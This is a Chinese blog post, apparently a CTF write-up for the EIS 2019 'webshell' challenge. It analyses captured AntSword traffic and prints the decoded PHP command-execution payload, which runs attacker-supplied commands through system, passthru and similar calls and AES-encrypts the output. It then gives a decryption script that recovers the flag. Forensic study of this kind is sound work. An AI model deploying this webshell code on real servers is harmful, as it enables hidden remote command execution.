[EIS 2019]webshell题解

最新推荐文章于 2024-05-20 14:08:31 发布
最新推荐文章于 2024-05-20 14:08:31 发布
阅读量360 收藏 8
点赞数 3
文章标签: android 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tlp_zzm/article/details/137293278
版权

根据题目名称,分析webshell流量,所以我们就过滤http协议

或者更细致一点,POST请求

image-20240318164132028

追踪流

image-20240318163345282

可以看到出题人很贴心,一眼蚁剑

QQ截图20240318163814

上图下面的部分是chr编码

import re

s = ""
result = re.findall(r'\((0x[0-9a-fA-F]+)\)', s)

print(result)
with open('1.txt' ,'w') as f:
    f.write(str(result))

image-20240318164520126

转一下

image-20240318170541616

需要把格式排一排

在线美化工具PHP格式化,在线美化PHP代码 - 在线工具(cainiaojc.com)

@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out) {
	@session_start();
	$key='f5045b05abe6ec9b1e37fafa851f5de9';
	return @base64_encode(openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA)); 
}
;
;
function asoutput() {
	$output=ob_get_contents();
	ob_end_clean();
	echo "8fc2b";
	echo @asenc($output);
	echo "bde96";
}
ob_start();
try {
	$p=base64_decode($_POST["0xc461e86196f1a"]);
	$s=base64_decode($_POST["0x9ec3fa98a283f"]);
	$d=dirname($_SERVER["SCRIPT_FILENAME"]);
	$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
	$r="{$p} {$c}";
	function fe($f) {
		$d=explode(",",@ini_get("disable_functions"));
		if(empty($d)) {
			$d=array();
		} else {
			$d=array_map('trim',array_map('strtolower',$d));
		}
		return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
	}
	;
	function runcmd($c) {
		$ret=0;
		if(fe('system')) {
			@system($c,$ret);
		} elseif(fe('passthru')) {
			@passthru($c,$ret);
		} elseif(fe('shell_exec')) {
			print(@shell_exec($c));
		} elseif(fe('exec')) {
			@exec($c,$o,$ret);
			print(join("
",$o));
		} elseif(fe('popen')) {
			$fp=@popen($c,'r');
			while(!@feof($fp)) {
				print(@fgets($fp, 2048));
			}
			@pclose($fp);
		} elseif(fe('antsystem')) {
			@antsystem($c);
		} else {
			$ret = 127;
		}
		return $ret;
	}
	;
	$ret=@runcmd($r." 2>&1");
	print ($ret!=0)?"ret={$ret}":"";
	;
}
catch(Exception $e) {
	echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();

QQ截图20240318171024

在后面几个流里面往下拉,都发现了神秘字符串

image-20240318172119593

image-20240318171926083

image-20240318171952606

image-20240318172018147

结合我们上面的发现的key,把这几个当做密文试一试

在流7里面成功了

<?php

$cipher = "8c2b4kRD1eD+vSZ81FAJ6XClabCR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dZOTFg4DW9MYwG6k3rEvAAR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJHygVK0ad8xG1Qk6pzSaCiR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJ1qI47Cz1/qfnNoNARGhLfVhC0RJlfeKCvbPwpjFn//BSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93FIVjxEmVnLHPVr5M/LQPdxSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93GnMvJfVbvphfWnt17IOkzYjvv91k2fnYDR7u4nlGM3YitxGYGs9mn+HS5iJBXORtYrcRmBrPZp/h0uYiQVzkbWK3EZgaz2af4dLmIkFc5G1itxGYGs9mn+HS5iJBXORtUq4dBjDRFhDqDyzs9CScJhrd3yMusQ+qsnZkq4Ey7NVJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l2hDPuDhVN4TaDLzp9bXyfGeCVhvglAaNo2rA/ovnRTTtfA5ZywMOOijj6md5RItqjXwOWcsDDjoo4+pneUSLao18DlnLAw46KOPqZ3lEi2qNfA5ZywMOOijj6md5RItqgS0b9hS7r5TX9YNZo2awgUAyqVacVgwr1NlNQ2k/kihhh0QQfnjeGdZhkz0N0jAKiMzFmAMa7xQ1URxTaHoHjDg3NaWl/8+PVG+pyaKrbNDjfl77POeQE8+0MCHpz6YxWLJ6mwCe1X3uzz/HSHcHSvQBB8FxjOhugOErOXkd3LZi/60Gr4gIEc1JIxA5A2pE/V6Z/DFwNOR4M/IIIWdGr5e2e10";

function decrypt($cipher) {
    $key = 'f5045b05abe6ec9b1e37fafa851f5de9';
    return @base64_decode(openssl_decrypt(base64_decode($cipher), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
};

$cipher = substr($cipher, 5, strlen($cipher) - 10);
echo decrypt($cipher);
?>

运行结果

image-20240318212936057

最后再解码一次

image-20240318213017442

flag{AntSword_is_Powerful_3222222!!!}

总结

主要考察对蚁剑流量的认识和脚本编写,设计蚁剑流量特征和AES加密的理解

之前学习的时候搜集了AES解密工具AES在线加密解密工具 - MKLab在线工具

但是这次做题并没有很理想地用工具将它解出来

image-20240318214400594

有考虑把开始的base64解码成二进制但不是乱码就是报错无法识别

最后填到里面也没有结果,也许这就是工具的局限性吧

星火sec_zero
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[EIS 2019]webshell的wp
weixin_45446164的博客
07-29 127
混淆可以在第二段可以发现之前输出了"8c2b4",最后输出了"e2e10",这里我没有读完代码,我还以为之前除了什么操作把前面的流全部解码了一遍 (:<所以可以判定前面留服务器返回的肯定是混淆之后的,所以把前置和后置的10个字符去除,然后在将encode改成decode解码(笑)一眼16进制来躲waf,并且在最后一段返回体发现了疑似base64的编码。这里注意输出的顺序是base64->Aes->base64->混淆。
BUUCTF__[EIS 2019]EzPOP_题解
风过江南乱的博客
04-28 923
BUUCTF__[EIS 2019]EzPOP_题解 php反序列化
『CTF Web复现』BUUCTF-[EIS 2019]EzPOP
Ho1aAs‘s Blog
10-07 1276
# 利用点 - base64 + filter协议绕过死亡exit
[EIS 2019]EzPOP
shinygod的博客
09-16 349
知识点:file_put_contents用php://filter绕过exit,代码审计
[BUUCTF][EIS 2019]EzPOP
cosmoslin的博客
02-07 348
[EIS 2019]EzPOP <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store
EIS 2019——misc3
pigredfive的博客
11-29 304
题目截图: 打开网页,有下载链接,下载下来一个html文件,打开: 解题过程: 一个html文件,可以考虑按F12来看一下源代码里面有没有flag。 找到一堆由Unicode编码格式的 (&zwnj ; )(&#8203 ; ) 这两个字符可以考虑用0,1替换掉,然后二进制转ascii。先考虑 (&zwnj ; )为0,(&#8203 ; )为1 的情况: ...
EIS2019-EzPOP
ro4lsc的博客
05-14 1380
做了这个题目,我收回我之前的话,我又懵逼了,不知道如何下手,还是自己的基础不够扎实,没关系,奥利给,淦!
ESET EIS 64位安装包
01-07
ESET EIS 64位版本离线安装包,安装包下载于2019-1-7日,需要准备序列号
EIS电路拟合AZSimDemo
06-07
EIS电路拟合AZSimDemo,非常好用,
eis.rar_eis_eis group 如何?
09-24
Discuz!模板 适用版本: Discuz! X2 语言编码: GBK简体 风格转换者: 原创 ...离开的人怀念这里的热干面,精武鸭,还有这里的人和事,Eis_010城市空间Discuz!X2.0模板发布,想想你怀念的是哪座城市呢?
eis
04-01
埃斯
EIS电化学阻抗谱基本原理与识图方法
03-26
讲述了电化学阻抗谱的基本原理,以及如何根据EIS阻抗谱图识别电化学系统参数
Android正向开发实现客户端证书认证
dafan0的博客
05-18 344
如果第三方模块被混淆,那hook方式均不能生效。这时就需要根据系统包去定位校验的函数,因此需要对安卓开发者是如何实现客户端证书校验的有一定了解,接下来就介绍这部分内容。开发者实现客户端证书校验的本质是:证书/密钥 + 代码。在形式上有:公钥校验、证书校验和Host(主机)校验。
安卓手机APP开发__支持64位的架构
红孩儿编程大师
05-15 620
在谷歌的应用中发布的APP需要支持64位的架构。添加上你的APP的64位的版本, 提供了性能上的提升,并且能够运行在仅支持64位的硬件上。
阿里云服务器下,部署LNMP环境安装wordpress
dl_11的博客
05-14 476
在阿里云环境下部署LNMP服务时,尤其是安装MySQL了时需要注意,和centos7不完全一样。在利用LNMP环境部署wordpress时,一定要先测试LNMP环境没问题,再部署wordpress,不然找问题好麻烦。MySQL和PHP,版本不同,部署和配置的方法不同,所以如果是安装的其他版本的本文章中的方法不一定实用。
Android Audio基础——AudioFlinger回放录制线程(七)
最新发布
小旭的专栏
05-20 203
PlaybackThread 和 RecordThread 的基类。录制线程类,由 ThreadBase 派生。回放线程基类,同由 ThreadBase 派生。混音回放线程类,由 PlaybackThread 派生,负责处理标识为 AUDIO_OUTPUT_FLAG_PRIMARY、AUDIO_OUTPUT_FLAG_FAST、AUDIO_OUTPUT_FLAG_DEEP_BUFFER 的音频流,MixerThread 可以把多个音轨的数据混音后再输出。
Android SDK的安装和配置
Rverdoser的博客
05-17 170
Android SDK的安装和配置是开发Android应用的重要步骤,下面我为你详细介绍一下这个过程:安装Android SDK1. 打开官网:首先,你需要访问Android SDK的官方网站,找到SDK工具的下载链接。2. 下载SDK:在官网上,选择适合你操作系统的SDK版本进行下载。通常,你可以选择ZIP压缩包或EXE安装包,两者在实际使用上没有太大区别。3. 解压并存放:下载完成后,将SDK文件解压到你想要存放的目录。注意,存放路径最好不要包含中文或特殊字符4. 运行安装程序:如果你下载的是EXE安装
eis spectrum analyzer
11-29
EIS谱分析仪是一种用于分析电化学阻抗谱的仪器。EIS代表电化学阻抗谱,它测量电化学系统中的电流和电压响应,以了解系统的电化学特性和界面的行为。 EIS谱分析仪是通过施加幅度和频率变化的正弦交流电信号来进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值